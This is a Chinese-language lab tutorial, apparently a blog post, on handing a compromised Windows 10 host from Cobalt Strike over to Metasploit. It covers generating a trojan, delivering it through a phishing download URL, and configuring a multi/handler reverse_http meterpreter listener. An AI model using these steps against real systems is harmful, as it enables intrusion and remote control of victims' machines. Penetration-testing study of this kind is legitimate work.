CobaltStrike权限传递MSF

一、测试环境

操作系统:

1.VMware17

2.kali 6.1.0-kali5-amd64

3.Win10x64

软件:

1.cs4.0

2.metasploit v6.3.4-dev

二、测试思路

1.cs是一款渗透测试工具,但没有漏洞利用的模块,我们可以在拿到目标主机的权限后,将权限转移给msf,再进行漏洞利用。

三、测试流程

1.启动cs

这两步需要在不同终端进行

本机地址和你设置的密码

打开cs

这里主机名为自己的地址,密码为刚才设定的密码,其他默认

看到此页面就下载成功

2.渗透目的主机

1.设置监听器

点击耳机

配置监听器,beacon http(反向连接),两个http主机都填写本地ip地址,选择一个不冲突的端口号,点击保存。

2.生成木马

选择边栏上的攻击,我们攻击Win10,选择此类型木马。

选择我们刚刚创建的监听器,并使用x64的payload,点击生成,建议保存到tmp中

为了将木马注入对方主机,我们使用钓鱼url下载

选择我们刚才生成的木马,注意:一些电脑可能运行不了ext格式的文件,我们需要将url中的ext改为exe,根据自己需求决定,file.ext就是目标主机下载的木马程序。点击开始

会生成一个钓鱼URL

3.在目标主机访问此URL

输入后自动下载木马程序(前提关闭系统防火墙和杀毒软件)

运行此木马程序后,我们可以在cs上发现此主机已经上线

右键上线的主机,进入beacon会话,输入sleep 0,使主机直接回复

测试是否成功

3.将cs的权限传递给msf

1.在cs新建一个监听器

记住名字,使用Foreign外部http,输入本机ip地址及一个不冲突的端口,点击保存。

2.msf连接cs

使用msf中这此模块

复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 本地ip
set lport 刚才新建cs监听器的端口号

输入run或者exploit开始运行

会出现这样一句话

返回cs,右键目标主机选择增添对话,选择我们新创建的监听器msf,点击choose

回到msf,我们会发现权限传递成功

出现此界面就代表传递成功,若不成功就反复增添会话和msf运行这两个步骤。

测试是否能使用此权限

乱码为msf版本编码问题

相关推荐
KKKlucifer8 小时前
数据安全合规自动化:策略落地、审计追溯与风险闭环技术解析
人工智能·安全
wanhengidc8 小时前
云手机 高振畅玩不踩坑
运维·服务器·安全·web安全·智能手机
易连EDI—EasyLink9 小时前
易连EDI–EasyLink实现OCR智能数据采集
网络·人工智能·安全·汽车·ocr·edi
JS_SWKJ10 小时前
网闸与光闸深度解析:高安全隔离设备核心知识与选型
安全
AIwenIPgeolocation10 小时前
出海应用合规与风控平衡术:可信ID的全球安全实践
人工智能·安全
长安链开源社区10 小时前
长安链2.3.8生产版本发布,安全、开放、灵活的企业级区块链底座
安全·区块链
数智化精益手记局11 小时前
拆解物料管理erp系统的核心功能,看物料管理erp系统如何解决库存积压与缺料难题
大数据·网络·人工智能·安全·信息可视化·精益工程
带娃的IT创业者11 小时前
Bitwarden CLI 供应链攻击深度分析:当密码管理工具本身成为安全威胁
安全·npm·安全漏洞·cli·供应链攻击·bitwarden
企业架构师老王11 小时前
2026制造业安全生产隐患识别AI方案:从主流产品对比看企业级AI Agent的非侵入式落地路径
人工智能·安全·ai
国冶机电安装11 小时前
化工厂生产线设备安装:从工艺安全到系统联动的完整解析
安全